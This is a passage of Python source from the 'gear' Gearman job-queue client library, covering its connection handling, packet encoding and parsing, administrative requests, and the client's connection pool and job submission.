self.use_ssl = False
if all([self.ssl_key, self.ssl_cert, self.ssl_ca]):
self.use_ssl = True
self.input_buffer = b''
self.need_bytes = False
self.echo_lock = threading.Lock()
self.send_lock = threading.Lock()
self._init()
def _init(self):
self.conn = None
self.connected = False
self.connect_time = None
self.related_jobs = {}
self.pending_tasks = []
self.admin_requests = []
self.echo_conditions = {}
self.options = set()
self.changeState("INIT")
def changeState(self, state):
# The state variables are provided as a convenience (and used by
# the Worker implementation). They aren't used or modified within
# the connection object itself except to reset to "INIT" immediately
# after reconnection.
self.log.debug("Setting state to: %s" % state)
self.state = state
self.state_time = time.time()
def __repr__(self):
return '<gear.Connection 0x%x host: %s port: %s>' % (
id(self), self.host, self.port)
def connect(self):
"""Open a connection to the server.
:raises ConnectionError: If unable to open the socket.
"""
self.log.debug("Connecting to %s port %s" % (self.host, self.port))
s = None
for res in socket.getaddrinfo(self.host, self.port,
socket.AF_UNSPEC, socket.SOCK_STREAM):
af, socktype, proto, canonname, sa = res
try:
s = socket.socket(af, socktype, proto)
if self.keepalive and hasattr(socket, 'TCP_KEEPIDLE'):
s.setsockopt(socket.SOL_SOCKET, socket.SO_KEEPALIVE, 1)
s.setsockopt(socket.IPPROTO_TCP, socket.TCP_KEEPIDLE,
self.tcp_keepidle)
s.setsockopt(socket.IPPROTO_TCP, socket.TCP_KEEPINTVL,
self.tcp_keepintvl)
s.setsockopt(socket.IPPROTO_TCP, socket.TCP_KEEPCNT,
self.tcp_keepcnt)
elif self.keepalive:
self.log.warning('Keepalive requested but not available '
'on this platform')
except socket.error:
s = None
continue
if self.use_ssl:
self.log.debug("Using SSL")
context = ssl.SSLContext(best_tls_version())
context.verify_mode = ssl.CERT_REQUIRED
context.check_hostname = False
context.load_cert_chain(self.ssl_cert, self.ssl_key)
context.load_verify_locations(self.ssl_ca)
s = context.wrap_socket(s, server_hostname=self.host)
try:
s.connect(sa)
except socket.error:
s.close()
s = None
continue
break
if s is None:
self.log.debug("Error connecting to %s port %s" % (
self.host, self.port))
raise ConnectionError("Unable to open socket")
self.log.info("Connected to %s port %s" % (self.host, self.port))
self.conn = s
self.connected = True
self.connect_time = time.time()
self.input_buffer = b''
self.need_bytes = False
def disconnect(self):
"""Disconnect from the server and remove all associated state
data.
"""
if self.conn:
try:
self.conn.close()
except Exception:
pass
self.log.info("Disconnected from %s port %s" % (self.host, self.port))
self._init()
def reconnect(self):
"""Disconnect from and reconnect to the server, removing all
associated state data.
"""
self.disconnect()
self.connect()
def sendRaw(self, data):
"""Send raw data over the socket.
:arg bytes data The raw data to send
"""
with self.send_lock:
sent = 0
while sent < len(data):
try:
sent += self.conn.send(data)
except ssl.SSLWantReadError:
continue
except ssl.SSLWantWriteError:
continue
def sendPacket(self, packet):
"""Send a packet to the server.
:arg Packet packet: The :py:class:`Packet` to send.
"""
self.log.info("Sending packet to %s: %s" % (self, packet))
self.sendRaw(packet.toBinary())
def _getAdminRequest(self):
return self.admin_requests.pop(0)
def _readRawBytes(self, bytes_to_read):
while True:
try:
buff = self.conn.recv(bytes_to_read)
except ssl.SSLWantReadError:
continue
except ssl.SSLWantWriteError:
continue
break
return buff
def _putAdminRequest(self, req):
self.admin_requests.insert(0, req)
def readPacket(self):
"""Read one packet or administrative response from the server.
:returns: The :py:class:`Packet` or :py:class:`AdminRequest` read.
:rtype: :py:class:`Packet` or :py:class:`AdminRequest`
"""
# This handles non-blocking or blocking IO.
datalen = 0
code = None
ptype = None
admin = None
admin_request = None
need_bytes = self.need_bytes
raw_bytes = self.input_buffer
try:
while True:
try:
if not raw_bytes or need_bytes:
segment = self._readRawBytes(4096)
if not segment:
# This occurs when the connection is closed. The
# the connect method will reset input_buffer and
# need_bytes for us.
return None
raw_bytes += segment
need_bytes = False
except RetryIOError:
if admin_request:
self._putAdminRequest(admin_request)
raise
if admin is None:
if raw_bytes[0:1] == b'\x00':
admin = False
else:
admin = True
admin_request = self._getAdminRequest()
if admin:
complete, remainder = admin_request.isComplete(raw_bytes)
if remainder is not None:
raw_bytes = remainder
if complete:
return admin_request
else:
length = len(raw_bytes)
if code is None and length >= 12:
code, ptype, datalen = struct.unpack('!4sii',
raw_bytes[:12])
if length >= datalen + 12:
end = 12 + datalen
p = Packet(code, ptype, raw_bytes[12:end],
connection=self)
raw_bytes = raw_bytes[end:]
return p
# If we don't return a packet above then we need more data
need_bytes = True
finally:
self.input_buffer = raw_bytes
self.need_bytes = need_bytes
def hasPendingData(self):
return self.input_buffer != b''
def sendAdminRequest(self, request, timeout=90):
"""Send an administrative request to the server.
:arg AdminRequest request: The :py:class:`AdminRequest` to send.
:arg numeric timeout: Number of seconds to wait until the response
is received. If None, wait forever (default: 90 seconds).
:raises TimeoutError: If the timeout is reached before the response
is received.
"""
self.admin_requests.append(request)
self.sendRaw(request.getCommand())
complete = request.waitForResponse(timeout)
if not complete:
raise TimeoutError()
def echo(self, data=None, timeout=30):
"""Perform an echo test on the server.
This method waits until the echo response has been received or the
timeout has been reached.
:arg bytes data: The data to request be echoed. If None, a random
unique byte string will be generated.
:arg numeric timeout: Number of seconds to wait until the response
is received. If None, wait forever (default: 30 seconds).
:raises TimeoutError: If the timeout is reached before the response
is received.
"""
if data is None:
data = uuid_module.uuid4().hex.encode('utf8')
self.echo_lock.acquire()
try:
if data in self.echo_conditions:
raise InvalidDataError("This client is already waiting on an "
"echo response of: %s" % data)
condition = threading.Condition()
self.echo_conditions[data] = condition
finally:
self.echo_lock.release()
self.sendEchoReq(data)
condition.acquire()
condition.wait(timeout)
condition.release()
if data in self.echo_conditions:
return data
raise TimeoutError()
def sendEchoReq(self, data):
p = Packet(constants.REQ, constants.ECHO_REQ, data)
self.sendPacket(p)
def handleEchoRes(self, data):
condition = None
self.echo_lock.acquire()
try:
condition = self.echo_conditions.get(data)
if condition:
del self.echo_conditions[data]
finally:
self.echo_lock.release()
if not condition:
return False
condition.notifyAll()
return True
def handleOptionRes(self, option):
self.options.add(option)
class AdminRequest(object):
"""Encapsulates a request (and response) sent over the
administrative protocol. This is a base class that may not be
instantiated dircectly; a subclass implementing a specific command
must be used instead.
:arg list arguments: A list of byte string arguments for the command.
The following instance attributes are available:
**response** (bytes)
The response from the server.
**arguments** (bytes)
The argument supplied with the constructor.
**command** (bytes)
The administrative command.
"""
command = None
arguments = []
response = None
_complete_position = 0
def __init__(self, *arguments):
self.wait_event = threading.Event()
self.arguments = arguments
if type(self) == AdminRequest:
raise NotImplementedError("AdminRequest must be subclassed")
def __repr__(self):
return '<gear.AdminRequest 0x%x command: %s>' % (
id(self), self.command)
def getCommand(self):
cmd = self.command
if self.arguments:
cmd += b' ' + b' '.join(self.arguments)
cmd += b'\n'
return cmd
def isComplete(self, data):
x = -1
start = self._complete_position
start = max(self._complete_position - 4, 0)
end_index_newline = data.find(b'\n.\n', start)
end_index_return = data.find(b'\r\n.\r\n', start)
if end_index_newline != -1:
x = end_index_newline + 3
elif end_index_return != -1:
x = end_index_return + 5
elif data.startswith(b'.\n'):
x = 2
elif data.startswith(b'.\r\n'):
x = 3
self._complete_position = len(data)
if x != -1:
self.response = data[:x]
return (True, data[x:])
else:
return (False, None)
def setComplete(self):
self.wait_event.set()
def waitForResponse(self, timeout=None):
self.wait_event.wait(timeout)
return self.wait_event.is_set()
class StatusAdminRequest(AdminRequest):
"""A "status" administrative request.
The response from gearman may be found in the **response** attribute.
"""
command = b'status'
def __init__(self):
super(StatusAdminRequest, self).__init__()
class ShowJobsAdminRequest(AdminRequest):
"""A "show jobs" administrative request.
The response from gearman may be found in the **response** attribute.
"""
command = b'show jobs'
def __init__(self):
super(ShowJobsAdminRequest, self).__init__()
class ShowUniqueJobsAdminRequest(AdminRequest):
"""A "show unique jobs" administrative request.
The response from gearman may be found in the **response** attribute.
"""
command = b'show unique jobs'
def __init__(self):
super(ShowUniqueJobsAdminRequest, self).__init__()
class CancelJobAdminRequest(AdminRequest):
"""A "cancel job" administrative request.
:arg str handle: The job handle to be canceled.
The response from gearman may be found in the **response** attribute.
"""
command = b'cancel job'
def __init__(self, handle):
handle = convert_to_bytes(handle)
super(CancelJobAdminRequest, self).__init__(handle)
def isComplete(self, data):
end_index_newline = data.find(b'\n')
if end_index_newline != -1:
x = end_index_newline + 1
self.response = data[:x]
return (True, data[x:])
else:
return (False, None)
class VersionAdminRequest(AdminRequest):
"""A "version" administrative request.
The response from gearman may be found in the **response** attribute.
"""
command = b'version'
def __init__(self):
super(VersionAdminRequest, self).__init__()
def isComplete(self, data):
end_index_newline = data.find(b'\n')
if end_index_newline != -1:
x = end_index_newline + 1
self.response = data[:x]
return (True, data[x:])
else:
return (False, None)
class WorkersAdminRequest(AdminRequest):
"""A "workers" administrative request.
The response from gearman may be found in the **response** attribute.
"""
command = b'workers'
def __init__(self):
super(WorkersAdminRequest, self).__init__()
class Packet(object):
"""A data packet received from or to be sent over a
:py:class:`Connection`.
:arg bytes code: The Gearman magic code (:py:data:`constants.REQ` or
:py:data:`constants.RES`)
:arg bytes ptype: The packet type (one of the packet types in
constants).
:arg bytes data: The data portion of the packet.
:arg Connection connection: The connection on which the packet
was received (optional).
:raises InvalidDataError: If the magic code is unknown.
"""
def __init__(self, code, ptype, data, connection=None):
if not isinstance(code, bytes) and not isinstance(code, bytearray):
raise TypeError("code must be of type bytes or bytearray")
if code[0:1] != b'\x00':
raise InvalidDataError("First byte of packet must be 0")
self.code = code
self.ptype = ptype
if not isinstance(data, bytes) and not isinstance(data, bytearray):
raise TypeError("data must be of type bytes or bytearray")
self.data = data
self.connection = connection
def __repr__(self):
ptype = constants.types.get(self.ptype, 'UNKNOWN')
try:
extra = self._formatExtraData()
except Exception:
extra = ''
return '<gear.Packet 0x%x type: %s%s>' % (id(self), ptype, extra)
def __eq__(self, other):
if not isinstance(other, Packet):
return False
if (self.code == other.code and
self.ptype == other.ptype and
self.data == other.data):
return True
return False
def __ne__(self, other):
return not self.__eq__(other)
def _formatExtraData(self):
if self.ptype in [constants.JOB_CREATED,
constants.JOB_ASSIGN,
constants.GET_STATUS,
constants.STATUS_RES,
constants.WORK_STATUS,
constants.WORK_COMPLETE,
constants.WORK_FAIL,
constants.WORK_EXCEPTION,
constants.WORK_DATA,
constants.WORK_WARNING]:
return ' handle: %s' % self.getArgument(0)
if self.ptype == constants.JOB_ASSIGN_UNIQ:
return (' handle: %s function: %s unique: %s' %
(self.getArgument(0),
self.getArgument(1),
self.getArgument(2)))
if self.ptype in [constants.SUBMIT_JOB,
constants.SUBMIT_JOB_BG,
constants.SUBMIT_JOB_HIGH,
constants.SUBMIT_JOB_HIGH_BG,
constants.SUBMIT_JOB_LOW,
constants.SUBMIT_JOB_LOW_BG,
constants.SUBMIT_JOB_SCHED,
constants.SUBMIT_JOB_EPOCH]:
return ' function: %s unique: %s' % (self.getArgument(0),
self.getArgument(1))
if self.ptype in [constants.CAN_DO,
constants.CANT_DO,
constants.CAN_DO_TIMEOUT]:
return ' function: %s' % (self.getArgument(0),)
if self.ptype == constants.SET_CLIENT_ID:
return ' id: %s' % (self.getArgument(0),)
if self.ptype in [constants.OPTION_REQ,
constants.OPTION_RES]:
return ' option: %s' % (self.getArgument(0),)
if self.ptype == constants.ERROR:
return ' code: %s message: %s' % (self.getArgument(0),
self.getArgument(1))
return ''
def toBinary(self):
"""Return a Gearman wire protocol binary representation of the packet.
:returns: The packet in binary form.
:rtype: bytes
"""
b = struct.pack('!4sii', self.code, self.ptype, len(self.data))
b = bytearray(b)
b += self.data
return b
def getArgument(self, index, last=False):
"""Get the nth argument from the packet data.
:arg int index: The argument index to look up.
:arg bool last: Whether this is the last argument (and thus
nulls should be ignored)
:returns: The argument value.
:rtype: bytes
"""
parts = self.data.split(b'\x00')
if not last:
return parts[index]
return b'\x00'.join(parts[index:])
def getJob(self):
"""Get the :py:class:`Job` associated with the job handle in
this packet.
:returns: The :py:class:`Job` for this packet.
:rtype: Job
:raises UnknownJobError: If the job is not known.
"""
handle = self.getArgument(0)
job = self.connection.related_jobs.get(handle)
if not job:
raise UnknownJobError()
return job
class BaseClientServer(object):
def __init__(self, client_id=None):
if client_id:
self.client_id = convert_to_bytes(client_id)
self.log = logging.getLogger("gear.BaseClientServer.%s" %
(self.client_id,))
else:
self.client_id = None
self.log = logging.getLogger("gear.BaseClientServer")
self.running = True
self.active_connections = []
self.inactive_connections = []
self.connection_index = -1
# A lock and notification mechanism to handle not having any
# current connections
self.connections_condition = threading.Condition()
# A pipe to wake up the poll loop in case it needs to restart
self.wake_read, self.wake_write = os.pipe()
self.poll_thread = threading.Thread(name="Gearman client poll",
target=self._doPollLoop)
self.poll_thread.daemon = True
self.poll_thread.start()
self.connect_thread = threading.Thread(name="Gearman client connect",
target=self._doConnectLoop)
self.connect_thread.daemon = True
self.connect_thread.start()
def _doConnectLoop(self):
# Outer run method of the reconnection thread
while self.running:
self.connections_condition.acquire()
while self.running and not self.inactive_connections:
self.log.debug("Waiting for change in available servers "
"to reconnect")
self.connections_condition.wait()
self.connections_condition.release()
self.log.debug("Checking if servers need to be reconnected")
try:
if self.running and not self._connectLoop():
# Nothing happened
time.sleep(2)
except Exception:
self.log.exception("Exception in connect loop:")
def _connectLoop(self):
# Inner method of the reconnection loop, triggered by
# a connection change
success = False
for conn in self.inactive_connections[:]:
self.log.debug("Trying to reconnect %s" % conn)
try:
conn.reconnect()
except ConnectionError:
self.log.debug("Unable to connect to %s" % conn)
continue
except Exception:
self.log.exception("Exception while connecting to %s" % conn)
continue
try:
self._onConnect(conn)
except Exception:
self.log.exception("Exception while performing on-connect "
"tasks for %s" % conn)
continue
self.connections_condition.acquire()
self.inactive_connections.remove(conn)
self.active_connections.append(conn)
self.connections_condition.notifyAll()
os.write(self.wake_write, b'1\n')
self.connections_condition.release()
try:
self._onActiveConnection(conn)
except Exception:
self.log.exception("Exception while performing active conn "
"tasks for %s" % conn)
success = True
return success
def _onConnect(self, conn):
# Called immediately after a successful (re-)connection
pass
def _onActiveConnection(self, conn):
# Called immediately after a connection is activated
pass
def _lostConnection(self, conn):
# Called as soon as a connection is detected as faulty. Remove
# it and return ASAP and let the connection thread deal with it.
self.log.debug("Marking %s as disconnected" % conn)
self.connections_condition.acquire()
try:
# NOTE(notmorgan): In the loop below it is possible to change the
# jobs list on the connection. In python 3 .values() is an iter not
# a static list, meaning that a change will break the for loop
# as the object being iterated on will have changed in size.
jobs = list(conn.related_jobs.values())
if conn in self.active_connections:
self.active_connections.remove(conn)
if conn not in self.inactive_connections:
self.inactive_connections.append(conn)
finally:
self.connections_condition.notifyAll()
self.connections_condition.release()
for job in jobs:
self.handleDisconnect(job)
def _doPollLoop(self):
# Outer run method of poll thread.
while self.running:
self.connections_condition.acquire()
while self.running and not self.active_connections:
self.log.debug("Waiting for change in available connections "
"to poll")
self.connections_condition.wait()
self.connections_condition.release()
try:
self._pollLoop()
except socket.error as e:
if e.errno == errno.ECONNRESET:
self.log.debug("Connection reset by peer")
# This will get logged later at info level as
# "Marking ... as disconnected"
except Exception:
self.log.exception("Exception in poll loop:")
def _pollLoop(self):
# Inner method of poll loop
self.log.debug("Preparing to poll")
poll = select.poll()
bitmask = (select.POLLIN | select.POLLERR |
select.POLLHUP | select.POLLNVAL)
# Reverse mapping of fd -> connection
conn_dict = {}
for conn in self.active_connections:
poll.register(conn.conn.fileno(), bitmask)
conn_dict[conn.conn.fileno()] = conn
# Register the wake pipe so that we can break if we need to
# reconfigure connections
poll.register(self.wake_read, bitmask)
while self.running:
self.log.debug("Polling %s connections" %
len(self.active_connections))
ret = poll.poll()
for fd, event in ret:
if fd == self.wake_read:
self.log.debug("Woken by pipe")
while True:
if os.read(self.wake_read, 1) == b'\n':
break
return
conn = conn_dict[fd]
if event & select.POLLIN:
# Process all packets that may have been read in this
# round of recv's by readPacket.
while True:
self.log.debug("Processing input on %s" % conn)
p = conn.readPacket()
if p:
if isinstance(p, Packet):
self.handlePacket(p)
else:
self.handleAdminRequest(p)
else:
self.log.debug("Received no data on %s" % conn)
self._lostConnection(conn)
return
if not conn.hasPendingData():
break
else:
self.log.debug("Received error event on %s" % conn)
self._lostConnection(conn)
return
def handlePacket(self, packet):
"""Handle a received packet.
This method is called whenever a packet is received from any
connection. It normally calls the handle method appropriate
for the specific packet.
:arg Packet packet: The :py:class:`Packet` that was received.
"""
self.log.info("Received packet from %s: %s" % (packet.connection,
packet))
start = time.time()
if packet.ptype == constants.JOB_CREATED:
self.handleJobCreated(packet)
elif packet.ptype == constants.WORK_COMPLETE:
self.handleWorkComplete(packet)
elif packet.ptype == constants.WORK_FAIL:
self.handleWorkFail(packet)
elif packet.ptype == constants.WORK_EXCEPTION:
self.handleWorkException(packet)
elif packet.ptype == constants.WORK_DATA:
self.handleWorkData(packet)
elif packet.ptype == constants.WORK_WARNING:
self.handleWorkWarning(packet)
elif packet.ptype == constants.WORK_STATUS:
self.handleWorkStatus(packet)
elif packet.ptype == constants.STATUS_RES:
self.handleStatusRes(packet)
elif packet.ptype == constants.GET_STATUS:
self.handleGetStatus(packet)
elif packet.ptype == constants.JOB_ASSIGN_UNIQ:
self.handleJobAssignUnique(packet)
elif packet.ptype == constants.JOB_ASSIGN:
self.handleJobAssign(packet)
elif packet.ptype == constants.NO_JOB:
self.handleNoJob(packet)
elif packet.ptype == constants.NOOP:
self.handleNoop(packet)
elif packet.ptype == constants.SUBMIT_JOB:
self.handleSubmitJob(packet)
elif packet.ptype == constants.SUBMIT_JOB_BG:
self.handleSubmitJobBg(packet)
elif packet.ptype == constants.SUBMIT_JOB_HIGH:
self.handleSubmitJobHigh(packet)
elif packet.ptype == constants.SUBMIT_JOB_HIGH_BG:
self.handleSubmitJobHighBg(packet)
elif packet.ptype == constants.SUBMIT_JOB_LOW:
self.handleSubmitJobLow(packet)
elif packet.ptype == constants.SUBMIT_JOB_LOW_BG:
self.handleSubmitJobLowBg(packet)
elif packet.ptype == constants.SUBMIT_JOB_SCHED:
self.handleSubmitJobSched(packet)
elif packet.ptype == constants.SUBMIT_JOB_EPOCH:
self.handleSubmitJobEpoch(packet)
elif packet.ptype == constants.GRAB_JOB_UNIQ:
self.handleGrabJobUniq(packet)
elif packet.ptype == constants.GRAB_JOB:
self.handleGrabJob(packet)
elif packet.ptype == constants.PRE_SLEEP:
self.handlePreSleep(packet)
elif packet.ptype == constants.SET_CLIENT_ID:
self.handleSetClientID(packet)
elif packet.ptype == constants.CAN_DO:
self.handleCanDo(packet)
elif packet.ptype == constants.CAN_DO_TIMEOUT:
self.handleCanDoTimeout(packet)
elif packet.ptype == constants.CANT_DO:
self.handleCantDo(packet)
elif packet.ptype == constants.RESET_ABILITIES:
self.handleResetAbilities(packet)
elif packet.ptype == constants.ECHO_REQ:
self.handleEchoReq(packet)
elif packet.ptype == constants.ECHO_RES:
self.handleEchoRes(packet)
elif packet.ptype == constants.ERROR:
self.handleError(packet)
elif packet.ptype == constants.ALL_YOURS:
self.handleAllYours(packet)
elif packet.ptype == constants.OPTION_REQ:
self.handleOptionReq(packet)
elif packet.ptype == constants.OPTION_RES:
self.handleOptionRes(packet)
else:
self.log.error("Received unknown packet: %s" % packet)
end = time.time()
self.reportTimingStats(packet.ptype, end - start)
def handleDisconnect(self, job):
"""Handle a Gearman server disconnection.
If the Gearman server is disconnected, this will be called for any
jobs currently associated with the server.
:arg Job packet: The :py:class:`Job` that was running when the server
disconnected.
"""
return job
def reportTimingStats(self, ptype, duration):
"""Report processing times by packet type
This method is called by handlePacket to report how long
processing took for each packet. The default implementation
does nothing.
:arg bytes ptype: The packet type (one of the packet types in
constants).
:arg float duration: The time (in seconds) it took to process
the packet.
"""
pass
def _defaultPacketHandler(self, packet):
self.log.error("Received unhandled packet: %s" % packet)
def handleJobCreated(self, packet):
return self._defaultPacketHandler(packet)
def handleWorkComplete(self, packet):
return self._defaultPacketHandler(packet)
def handleWorkFail(self, packet):
return self._defaultPacketHandler(packet)
def handleWorkException(self, packet):
return self._defaultPacketHandler(packet)
def handleWorkData(self, packet):
return self._defaultPacketHandler(packet)
def handleWorkWarning(self, packet):
return self._defaultPacketHandler(packet)
def handleWorkStatus(self, packet):
return self._defaultPacketHandler(packet)
def handleStatusRes(self, packet):
return self._defaultPacketHandler(packet)
def handleGetStatus(self, packet):
return self._defaultPacketHandler(packet)
def handleJobAssignUnique(self, packet):
return self._defaultPacketHandler(packet)
def handleJobAssign(self, packet):
return self._defaultPacketHandler(packet)
def handleNoJob(self, packet):
return self._defaultPacketHandler(packet)
def handleNoop(self, packet):
return self._defaultPacketHandler(packet)
def handleSubmitJob(self, packet):
return self._defaultPacketHandler(packet)
def handleSubmitJobBg(self, packet):
return self._defaultPacketHandler(packet)
def handleSubmitJobHigh(self, packet):
return self._defaultPacketHandler(packet)
def handleSubmitJobHighBg(self, packet):
return self._defaultPacketHandler(packet)
def handleSubmitJobLow(self, packet):
return self._defaultPacketHandler(packet)
def handleSubmitJobLowBg(self, packet):
return self._defaultPacketHandler(packet)
def handleSubmitJobSched(self, packet):
return self._defaultPacketHandler(packet)
def handleSubmitJobEpoch(self, packet):
return self._defaultPacketHandler(packet)
def handleGrabJobUniq(self, packet):
return self._defaultPacketHandler(packet)
def handleGrabJob(self, packet):
return self._defaultPacketHandler(packet)
def handlePreSleep(self, packet):
return self._defaultPacketHandler(packet)
def handleSetClientID(self, packet):
return self._defaultPacketHandler(packet)
def handleCanDo(self, packet):
return self._defaultPacketHandler(packet)
def handleCanDoTimeout(self, packet):
return self._defaultPacketHandler(packet)
def handleCantDo(self, packet):
return self._defaultPacketHandler(packet)
def handleResetAbilities(self, packet):
return self._defaultPacketHandler(packet)
def handleEchoReq(self, packet):
return self._defaultPacketHandler(packet)
def handleEchoRes(self, packet):
return self._defaultPacketHandler(packet)
def handleError(self, packet):
return self._defaultPacketHandler(packet)
def handleAllYours(self, packet):
return self._defaultPacketHandler(packet)
def handleOptionReq(self, packet):
return self._defaultPacketHandler(packet)
def handleOptionRes(self, packet):
return self._defaultPacketHandler(packet)
def handleAdminRequest(self, request):
"""Handle an administrative command response from Gearman.
This method is called whenever a response to a previously
issued administrative command is received from one of this
client's connections. It normally releases the wait lock on
the initiating AdminRequest object.
:arg AdminRequest request: The :py:class:`AdminRequest` that
initiated the received response.
"""
self.log.info("Received admin data %s" % request)
request.setComplete()
def shutdown(self):
"""Close all connections and stop all running threads.
The object may no longer be used after shutdown is called.
"""
if self.running:
self.log.debug("Beginning shutdown")
self._shutdown()
self.log.debug("Beginning cleanup")
self._cleanup()
self.log.debug("Finished shutdown")
else:
self.log.warning("Shutdown called when not currently running. "
"Ignoring.")
def _shutdown(self):
# The first part of the shutdown process where all threads
# are told to exit.
self.running = False
self.connections_condition.acquire()
try:
self.connections_condition.notifyAll()
os.write(self.wake_write, b'1\n')
finally:
self.connections_condition.release()
def _cleanup(self):
# The second part of the shutdown process where we wait for all
# threads to exit and then clean up.
self.poll_thread.join()
self.connect_thread.join()
for connection in self.active_connections:
connection.disconnect()
self.active_connections = []
self.inactive_connections = []
os.close(self.wake_read)
os.close(self.wake_write)
class BaseClient(BaseClientServer):
def __init__(self, client_id='unknown'):
super(BaseClient, self).__init__(client_id)
self.log = logging.getLogger("gear.BaseClient.%s" % (self.client_id,))
# A lock to use when sending packets that set the state across
# all known connections. Note that it doesn't necessarily need
# to be used for all broadcasts, only those that affect multi-
# connection state, such as setting options or functions.
self.broadcast_lock = threading.RLock()
def addServer(self, host, port=4730,
ssl_key=None, ssl_cert=None, ssl_ca=None,
keepalive=False, tcp_keepidle=7200, tcp_keepintvl=75,
tcp_keepcnt=9):
"""Add a server to the client's connection pool.
Any number of Gearman servers may be added to a client. The
client will connect to all of them and send jobs to them in a
round-robin fashion. When servers are disconnected, the
client will automatically remove them from the pool,
continuously try to reconnect to them, and return them to the
pool when reconnected. New servers may be added at any time.
This is a non-blocking call that will return regardless of
whether the initial connection succeeded. If you need to
ensure that a connection is ready before proceeding, see
:py:meth:`waitForServer`.
When using SSL connections, all SSL files must be specified.
:arg str host: The hostname or IP address of the server.
:arg int port: The port on which the gearman server is listening.
:arg str ssl_key: Path to the SSL private key.
:arg str ssl_cert: Path to the SSL certificate.
:arg str ssl_ca: Path to the CA certificate.
:arg bool keepalive: Whether to use TCP keepalives
:arg int tcp_keepidle: Idle time after which to start keepalives
sending
:arg int tcp_keepintvl: Interval in seconds between TCP keepalives
:arg int tcp_keepcnt: Count of TCP keepalives to send before disconnect
:raises ConfigurationError: If the host/port combination has
already been added to the client.
"""
self.log.debug("Adding server %s port %s" % (host, port))
self.connections_condition.acquire()
try:
for conn in self.active_connections + self.inactive_connections:
if conn.host == host and conn.port == port:
raise ConfigurationError("Host/port already specified")
conn = NonBlockingConnection(host, port, ssl_key, ssl_cert, ssl_ca,
self.client_id, keepalive,
tcp_keepidle, tcp_keepintvl,
tcp_keepcnt)
self.inactive_connections.append(conn)
self.connections_condition.notifyAll()
finally:
self.connections_condition.release()
def _checkTimeout(self, start_time, timeout):
if time.time() - start_time > timeout:
raise TimeoutError()
def waitForServer(self, timeout=None):
"""Wait for at least one server to be connected.
Block until at least one gearman server is connected.
:arg numeric timeout: Number of seconds to wait for a connection.
If None, wait forever (default: no timeout).
:raises TimeoutError: If the timeout is reached before any server
connects.
"""
connected = False
start_time = time.time()
while self.running:
self.connections_condition.acquire()
try:
while self.running and not self.active_connections:
if timeout is not None:
self._checkTimeout(start_time, timeout)
self.log.debug("Waiting for at least one active "
"connection")
self.connections_condition.wait(timeout=1)
if self.active_connections:
self.log.debug("Active connection found")
connected = True
finally:
self.connections_condition.release()
if connected:
return
def getConnection(self):
"""Return a connected server.
Finds the next scheduled connected server in the round-robin
rotation and returns it. It is not usually necessary to use
this method external to the library, as more consumer-oriented
methods such as submitJob already use it internally, but is
available nonetheless if necessary.
:returns: The next scheduled :py:class:`Connection` object.
:rtype: :py:class:`Connection`
:raises NoConnectedServersError: If there are not currently
connected servers.
"""
conn = None
try:
self.connections_condition.acquire()
if not self.active_connections:
raise NoConnectedServersError("No connected Gearman servers")
self.connection_index += 1
if self.connection_index >= len(self.active_connections):
self.connection_index = 0
conn = self.active_connections[self.connection_index]
finally:
self.connections_condition.release()
return conn
def broadcast(self, packet):
"""Send a packet to all currently connected servers.
:arg Packet packet: The :py:class:`Packet` to send.
"""
connections = self.active_connections[:]
for connection in connections:
try:
self.sendPacket(packet, connection)
except Exception:
# Error handling is all done by sendPacket
pass
def sendPacket(self, packet, connection):
"""Send a packet to a single connection, removing it from the
list of active connections if that fails.
:arg Packet packet: The :py:class:`Packet` to send.
:arg Connection connection: The :py:class:`Connection` on
which to send the packet.
"""
try:
connection.sendPacket(packet)
return
except Exception:
self.log.exception("Exception while sending packet %s to %s" %
(packet, connection))
# If we can't send the packet, discard the connection
self._lostConnection(connection)
raise
def handleEchoRes(self, packet):
"""Handle an ECHO_RES packet.
Causes the blocking :py:meth:`Connection.echo` invocation to
return.
:arg Packet packet: The :py:class:`Packet` that was received.
:returns: None
"""
packet.connection.handleEchoRes(packet.getArgument(0, True))
def handleError(self, packet):
"""Handle an ERROR packet.
Logs the error.
:arg Packet packet: The :py:class:`Packet` that was received.
:returns: None
"""
self.log.error("Received ERROR packet: %s: %s" %
(packet.getArgument(0),
packet.getArgument(1)))
try:
task = packet.connection.pending_tasks.pop(0)
task.setComplete()
except Exception:
self.log.exception("Exception while handling error packet:")
self._lostConnection(packet.connection)
class Client(BaseClient):
"""A Gearman client.
You may wish to subclass this class in order to override the
default event handlers to react to Gearman events. Be sure to
call the superclass event handlers so that they may perform
job-related housekeeping.
:arg str client_id: The client ID to provide to Gearman. It will
appear in administrative output and be appended to the name of
the logger (e.g., gear.Client.client_id). Defaults to
'unknown'.
"""
def __init__(self, client_id='unknown'):
super(Client, self).__init__(client_id)
self.log = logging.getLogger("gear.Client.%s" % (self.client_id,))
self.options = set()
def __repr__(self):
return '<gear.Client 0x%x>' % id(self)
def _onConnect(self, conn):
# Called immediately after a successful (re-)connection
self.broadcast_lock.acquire()
try:
super(Client, self)._onConnect(conn)
for name in self.options:
self._setOptionConnection(name, conn)
finally:
self.broadcast_lock.release()
def _setOptionConnection(self, name, conn):
# Set an option on a connection
packet = Packet(constants.REQ, constants.OPTION_REQ, name)
task = OptionReqTask()
try:
conn.pending_tasks.append(task)
self.sendPacket(packet, conn)
except Exception:
# Error handling is all done by sendPacket
task = None
return task
def setOption(self, name, timeout=30):
"""Set an option for all connections.
:arg str name: The option name to set.
:arg int timeout: How long to wait (in seconds) for a response
from the server before giving up (default: 30 seconds).
:returns: True if the option was set on all connections,
otherwise False
:rtype: bool
"""
tasks = {}
name = convert_to_bytes(name)
self.broadcast_lock.acquire()
try:
self.options.add(name)
connections = self.active_connections[:]
for connection in connections:
task = self._setOptionConnection(name, connection)
if task:
tasks[task] = connection
finally:
self.broadcast_lock.release()
success = True
for task in tasks.keys():
complete = task.wait(timeout)
conn = tasks[task]
if not complete:
self.log.error("Connection %s timed out waiting for a "
"response to an option request: %s" %
(conn, name))
self._lostConnection(conn)
continue
if name not in conn.options:
success = False
return success
def submitJob(self, job, background=False, precedence=PRECEDENCE_NORMAL,
timeout=30):
"""Submit a job to a Gearman server.
Submits the provided job to the next server in this client's
round-robin connection pool.
If the job is a foreground job, updates will be made to the
supplied :py:class:`Job` object as they are received.
:arg Job job: The :py:class:`Job` to submit.
:arg bool background: Whether the job should be backgrounded.
:arg int precedence: Whether the job should have normal, low, or
high precedence. One of :py:data:`PRECEDENCE_NORMAL`,
:py:data:`PRECEDENCE_LOW`, or :py:data:`PRECEDENCE_HIGH`
:arg int timeout: How long to wait (in seconds) for a response
from the server before giving up (default: 30 seconds).
:raises ConfigurationError: If an invalid precendence value
is supplied.
"""
if job.unique is None:
unique = b''
else:
